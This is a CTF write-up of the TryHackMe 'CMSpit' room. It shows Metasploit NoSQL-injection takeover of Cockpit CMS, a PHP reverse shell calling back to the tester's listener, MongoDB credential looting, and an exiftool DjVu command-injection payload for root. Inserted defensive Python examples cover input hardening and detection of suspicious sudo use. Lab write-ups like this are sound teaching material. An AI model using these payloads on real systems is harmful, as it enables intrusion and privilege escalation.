7 August 2021 / TRYHACKME, CTF, MEDIUM

# CMSpit Write Up

## Overview

CMSpit is a medium-rated CTF room on TryHackMe. This was a good machine highlighting recent CVEs, thanks stuxnet.

## Nmap

Although not required, I added an entry in my hosts file mapping the machine IP to cmspit.thm. Once added, I started an nmap scan to check for available ports.

```
└──╼ $sudo nmap -sC -sV -oA nmap/initial cmspit.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-08 11:11 BST
Nmap scan report for cmspit.thm (10.10.34.218)
Host is up (0.035s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 7f:25:f9:40:23:25:cd:29:8b:28:a9:d9:82:f5:49:e4 (RSA)
|   256 0a:f4:29:ed:55:43:19:e7:73:a7:09:79:30:a8:49:1b (ECDSA)
|_  256 2f:43:ad:a3:d1:5b:64:86:33:07:5d:94:f9:dc:a4:01 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds
```

2 ports open:

- 22 - SSH - OpenSSH 7.2p2
- 80 - HTTP - Apache 2.4.18

I ran a full port scan but no additional ports were found.

## Enumeration

Clearly this is going to be a web challenge. While I poked around the website I wanted some enumeration going on in the background, so I started Gobuster and Nikto.
```
└──╼ $gobuster dir -u cmspit.thm -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://cmspit.thm
[+] Threads:        10
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/08/08 11:16:09 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://cmspit.thm/fbaebb24-03e7-4123-b75f-01915dfcbf6b => 302. To force processing of Wildcard responses, specify the '--wildcard' switch
```

It looks like all requests are being redirected to 'http://cmspit.thm/auth/login?to=/'. I did, however, have some more luck with Nikto.

```
└──╼ $nikto -h cmspit.thm
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.34.218
+ Target Hostname:    cmspit.thm
+ Target Port:        80
+ Start Time:         2021-08-08 11:18:16 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Cookie 8071dec2be26139e39a170762581c00f created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /auth/login?to=/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-3233: /icons/README: Apache default file found.
+ Retrieved access-control-allow-origin header: *
+ /server-status: Apache server-status interface found (protected/forbidden)
+ /composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /package.json: Node.js package file found. It may contain sensitive information.
+ 7789 requests: 3 error(s) and 10 item(s) reported on remote host
+ End Time:           2021-08-08 11:25:02 (GMT1) (406 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

I went to http://cmspit.thm/, which redirected me to http://cmspit.thm/auth/login?to=/. I tried some basic username and password combinations but nothing worked. From the logo and name on the authentication page, it's clear we are working with Cockpit CMS. I checked the source code and found the version 0.11.1. This was also confirmed by going to http://cmspit.thm/package.json, found via Nikto.

I googled 'cockpit cms 0.11.1 exploit' and found a great blog by Nikita Petrov; however, I'm lazy and also found a Metasploit module.

```
msf6 > search cockpit

Matching Modules
================

   #  Name                                Disclosure Date  Rank    Check  Description
   -  ----                                ---------------  ----    -----  -----------
   0  exploit/multi/http/cockpit_cms_rce  2021-04-13       normal  Yes    Cockpit CMS NoSQLi to RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/cockpit_cms_rce

msf6 > 
```

I selected the module using the command 'use 0' and filled out the options.
```
msf6 exploit(multi/http/cockpit_cms_rce) > show options

Module options (exploit/multi/http/cockpit_cms_rce):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   ENUM_USERS  true             no        Enumerate users
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      cmspit.thm       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The URI of Cockpit
   USER                         no        User account to take over
   VHOST                        no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(multi/http/cockpit_cms_rce) > 
```

I ran the module and was able to find 4 users; however, the module then failed as a user was required.

```
msf6 exploit(multi/http/cockpit_cms_rce) > run

[*] Started reverse TCP handler on <Local Machine>:4444 
[*] Attempting Username Enumeration (CVE-2020-35846)
[+] Found users: ["admin", "darkStar7471", "skidy", "ekoparty"]
[-] Exploit aborted due to failure: bad-config: cmspit.thm:80 - User to exploit required
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/cockpit_cms_rce) > 
```

I set user to admin and ran the module again.
```
msf6 exploit(multi/http/cockpit_cms_rce) > set user admin
user => admin
msf6 exploit(multi/http/cockpit_cms_rce) > run

[*] Started reverse TCP handler on <Local Machine>:4444 
[*] Attempting Username Enumeration (CVE-2020-35846)
[+] Found users: ["admin", "darkStar7471", "skidy", "ekoparty"]
[*] Obtaining reset tokens (CVE-2020-35847)
[+] Found tokens: ["rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23"]
[*] Checking token: rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23
[*] Obtaining user info
[*]  user: admin
[*]  name: Admin
[*]  email: admin@yourdomain.de
[*]  active: true
[*]  group: admin
[*]  password: <REDACTED>
[*]  i18n: en
[*]  _created: 1621655201
[*]  _modified: 1621655201
[*]  _id: 60a87ea165343539ee000300
[*]  _reset_token: rp-d72d501f6207ac757ac3cb114d1a0a4760a88abe28f23
[*]  md5email: a11eea8bf873a483db461bb169beccec
[+] Changing password to <REDACTED>
[+] Password update successful
[*] Attempting login
[-] Exploit failed: ArgumentError wrong number of arguments (given 3, expected 1..2)
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/cockpit_cms_rce) > 
```

The exploit failed again; however, it was able to change the admin password. I went back to the login page and was able to log in as admin.

## Initial Access

In the blog post, RCE was possible by uploading a PHP script via the finder directory, so I went to cmspit.thm/finder. I copied a PHP reverse shell script to my directory.

```
└──╼ $cp /usr/share/webshells/php/php-reverse-shell.php .
┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit]
└──╼ $mv php-reverse-shell.php shell.php
┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit]
```

I updated the script with my tun0 IP and port 4444, and started a nc listener with the command `nc -nvlp 4444`. On the webpage I clicked the upload button and selected my shell.php file. Now going to 'http://cmspit.thm/shell.php' I get a shell!

## Priv Esc

Now that I have a shell as www-data, I want to escalate my privileges.
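Stepping back to the web side of the chain for a moment: the Metasploit module worked because the login lookup accepted a JSON object where a username string was expected (the NoSQL injection behind CVE-2020-35846) and because the password reset token sat in the user record in a form that could be read back and used directly (CVE-2020-35847). The following is an added example, not code from this write-up or from Cockpit CMS, showing what the server-side fixes look like in Python. The request body shape, the record field names and the 15-minute token lifetime are assumptions made for the example.

```python
"""Added example (not from the write-up or from Cockpit CMS's code base):
server-side fixes for the two weaknesses the Metasploit module chained,
a NoSQL-injectable login lookup and recoverable password reset tokens.
Request shape, record field names and the token lifetime are assumptions."""
import hashlib
import hmac
import secrets
import time
from typing import Any, Optional


class UnsafeInput(ValueError):
    """Raised when a request value could change the meaning of a MongoDB filter."""


def assert_scalar_string(value: Any, field: str) -> str:
    # MongoDB treats a dict in a filter as an operator expression, so a login
    # name that arrives as an object would be evaluated instead of compared.
    # Only a plain string is acceptable here; anything else is rejected before
    # it reaches the query builder.
    if not isinstance(value, str):
        raise UnsafeInput(f"{field} must be a string, got {type(value).__name__}")
    return value


def vulnerable_login_filter(body: dict) -> dict:
    # The injectable pattern: the decoded JSON value is dropped into the
    # filter unchanged, whatever its type.
    return {"user": body["user"]}


def hardened_login_filter(body: dict) -> dict:
    # Type-checked before use, so the filter can only ever be an equality match.
    return {"user": assert_scalar_string(body.get("user"), "user")}


def is_injectable(body: dict) -> bool:
    """True when the hardened filter would refuse this request body."""
    try:
        hardened_login_filter(body)
    except UnsafeInput:
        return True
    return False


RESET_TOKEN_TTL = 15 * 60  # seconds; an assumption for this example


def issue_reset_token(user_record: dict) -> str:
    """Generate a reset token, store only its SHA-256 hash plus an expiry on
    the record, and return the plaintext to be e-mailed. A leaked record (as
    the whole admin document was above) then holds nothing replayable."""
    token = "rp-" + secrets.token_hex(24)
    user_record["_reset_token_hash"] = hashlib.sha256(token.encode()).hexdigest()
    user_record["_reset_token_expires"] = time.time() + RESET_TOKEN_TTL
    return token


def verify_reset_token(user_record: dict, presented: str,
                       now: Optional[float] = None) -> bool:
    """Constant-time, single-use, expiring check of a presented reset token."""
    now = time.time() if now is None else now
    stored = user_record.get("_reset_token_hash")
    expires = user_record.get("_reset_token_expires", 0)
    if stored is None or now > expires:
        return False
    digest = hashlib.sha256(presented.encode()).hexdigest()
    ok = hmac.compare_digest(stored, digest)
    if ok:
        # Single use: a token that has worked once must never work again.
        user_record.pop("_reset_token_hash", None)
        user_record.pop("_reset_token_expires", None)
    return ok


if __name__ == "__main__":
    print(hardened_login_filter({"user": "admin", "password": "x"}))
    print("object rejected:", is_injectable({"user": {"$regex": "^a"}}))
    rec = {"user": "admin"}
    tok = issue_reset_token(rec)
    print("stored fields:", sorted(rec))
    print("valid once:", verify_reset_token(rec, tok), "again:", verify_reset_token(rec, tok))
```

Every value that ends up in a MongoDB filter deserves the same type check, not just the user field; and storing only a hash of the reset token means that even a full dump of the users collection, like the one the module obtained here, does not let anyone complete a reset.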
I enumerated the machine and noticed MongoDB was listening on TCP port 27017.

```
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 :::80                   :::*                    LISTEN      off (0.00/0/0)
tcp6       0      0 :::22                   :::*                    LISTEN      off (0.00/0/0)
```

I connected to the MongoDB service and was able to find the credentials for the user 'stux'.

```
$ mongo 127.0.0.1:27017
MongoDB shell version: 2.6.10
connecting to: 127.0.0.1:27017/test
> show dbs
admin         (empty)
local         0.078GB
sudousersbak  0.078GB
> use sudousersbak
switched to db sudousersbak
> show collections
flag
system.indexes
user
> db.user.find()
{ "_id" : ObjectId("60a89d0caadffb0ea68915f9"), "name" : "<REDACTED>" }
{ "_id" : ObjectId("60a89dfbaadffb0ea68915fa"), "name" : "stux" }
```

I used the credentials to SSH to the machine and ran the command 'sudo -l'.

```
└──╼ $ssh stux@cmspit.thm
stux@cmspit.thm's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Sat May 22 19:41:38 2021 from 192.168.85.1
stux@ubuntu:~$ sudo -l
Matching Defaults entries for stux on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User stux may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/local/bin/exiftool
stux@ubuntu:~$ 
```

The user stux can run the command /usr/local/bin/exiftool as root without the root password. Normally, I would now go to GTFOBins to look for a priv esc; however, the room questions indicate a CVE vulnerability, so I googled 'exiftools CVE' and found this blog.
The blog details the steps to exploit the vulnerability, which are:

```
$ sudo apt install djvulibre-bin
$ bzz payload payload.bzz
$ djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
```

Back on my local machine, I created a payload file with the following contents, `(metadata "\c${system('/bin/bash')};")`, then followed the steps above.

```
┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit]
└──╼ $cat payload
(metadata "\c${system('/bin/bash')};")
┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit]
└──╼ $sudo apt install djvulibre-bin
Reading package lists... Done
Building dependency tree       
Reading state information... Done
djvulibre-bin is already the newest version (3.5.28-2).
The following packages were automatically installed and are no longer required:
  gdal-data libaec0 libarmadillo9 libarpack2 libboost-locale1.67.0 libcfitsio8 libcharls2 libdap25
  libdapclient6v5 libepsilon1 libfreexl1 libfyba0 libgdal26 libgeos-3.8.1 libgeos-c1v5 libgeotiff5
  libgfapi0 libgfrpc0 libgfxdr0 libglusterfs0 libhdf4-0-alt libhdf5-103 libkmlbase1 libkmldom1
  libkmlengine1 libnetcdf15 libogdi4.1 liborcus-0.15-0 liborcus-parser-0.15-0 libproj19
  libpython3.7-minimal libpython3.7-stdlib libpython3.8-dev libqhull7 libspatialite7 libsuperlu5
  libsz2 liburiparser1 libxerces-c3.2 odbcinst odbcinst1debian2 proj-bin proj-data python3-gridfs
  python3.7 python3.7-minimal python3.8-dev
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 2541 not upgraded.
┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit]
└──╼ $bzz payload payload.bzz
┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit]
└──╼ $djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit]
└──╼ $ls -la exploit.djvu
-rw-r--r-- 1 daz daz 92 Aug  8 12:13 exploit.djvu
┌─[daz@parrot]─[~/Documents/TryHackMe/CMSpit]
└──╼ $
```

Finally, I started a Python webserver with the command `sudo python3 -m http.server 80`.
Next, back on the cmspit machine, I downloaded the exploit.djvu file with wget, ran exiftool with sudo against the exploit file and got root!

```
stux@ubuntu:~$ wget http://<Local Machine>/exploit.djvu
--2021-08-08 04:16:42--  http://<Local Machine>/exploit.djvu
Connecting to <Local Machine>:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 92 [image/vnd.djvu]
Saving to: ‘exploit.djvu’

exploit.djvu        100%[===========================================================================================>]      92  --.-KB/s    in 0s      

2021-08-08 04:16:42 (17.8 MB/s) - ‘exploit.djvu’ saved [92/92]

stux@ubuntu:~$ sudo /usr/local/bin/exiftool exploit.djvu
root@ubuntu:~# whoami
root
root@ubuntu:~# hostname
```

Thanks for reading!

============================================================

Any comments or feedback welcome! You can find me on twitter.
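A defender's footnote to the privilege escalation above: the root cause is a sudoers entry that lets a user run a rich-format file parser as root, without a password, on a file that the user controls. Here is an added example, not from this write-up, of detection logic over sudo's standard syslog entries that flags exactly that shape of invocation: a watch-listed parser, run as root, with a non-option argument resolving into a user-writable directory. The log lines are constructed for the example and the watchlist of parser commands is an assumption.

```python
"""Added example (not part of the write-up): flag sudo log entries where a
file-parsing tool runs as root on a file in a user-writable location, the
pattern behind the exiftool step above. Sample log lines are constructed;
the parser watchlist is an assumption to be tuned per environment."""
import posixpath
import re
from typing import List, Optional

# sudo's default syslog line: "<user> : TTY=... ; PWD=... ; USER=... ; COMMAND=..."
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s+:\s+TTY=(?P<tty>\S+)\s+;\s+PWD=(?P<pwd>\S+)\s+;"
    r"\s+USER=(?P<target>\S+)\s+;\s+COMMAND=(?P<command>.+)$"
)

# Tools that parse complex, user-supplied file formats (assumption; extend as needed).
PARSER_WATCHLIST = {"exiftool", "convert", "identify", "ffmpeg"}
# Directories an unprivileged user can normally write to.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def parse_sudo_line(line: str) -> Optional[dict]:
    """Split one sudo syslog line into its fields, or None if it is not one."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["argv"] = entry["command"].split()
    return entry


def resolve(pwd: str, arg: str) -> str:
    # sudo logs arguments as typed; a relative path is relative to the logged PWD.
    return posixpath.normpath(arg if arg.startswith("/") else posixpath.join(pwd, arg))


def is_suspicious(entry: dict) -> bool:
    """Root-run watch-listed parser whose input lives in a user-writable tree."""
    if entry["target"] != "root" or not entry["argv"]:
        return False
    if posixpath.basename(entry["argv"][0]) not in PARSER_WATCHLIST:
        return False
    for arg in entry["argv"][1:]:
        if arg.startswith("-"):  # option flags are not file arguments
            continue
        if resolve(entry["pwd"], arg).startswith(USER_WRITABLE_PREFIXES):
            return True
    return False


def flag_sudo_lines(lines: List[str]) -> List[str]:
    """Return the raw log lines that deserve an analyst's attention."""
    return [line for line in lines
            if (entry := parse_sudo_line(line)) is not None and is_suspicious(entry)]


# Constructed sample lines; only the first should fire.
SAMPLE_LOG = [
    "Aug  8 04:17:01 ubuntu sudo:     stux : TTY=pts/0 ; PWD=/home/stux ; USER=root ; COMMAND=/usr/local/bin/exiftool exploit.djvu",
    "Aug  8 03:55:12 ubuntu sudo:     stux : TTY=pts/0 ; PWD=/home/stux ; USER=root ; COMMAND=/usr/bin/apt update",
    "Aug  8 02:10:45 ubuntu sudo:    admin : TTY=pts/1 ; PWD=/opt/site ; USER=root ; COMMAND=/usr/local/bin/exiftool -ver",
    "Aug  8 02:12:03 ubuntu sudo:    admin : TTY=pts/1 ; PWD=/opt/site ; USER=root ; COMMAND=/usr/local/bin/exiftool /opt/site/logo.png",
]

if __name__ == "__main__":
    for hit in flag_sudo_lines(SAMPLE_LOG):
        print("FLAG:", hit)
```

The rule complements, rather than replaces, removing the NOPASSWD entry and keeping exiftool patched; since sudo writes every invocation in this format by default, it is cheap to run over /var/log/auth.log on a schedule.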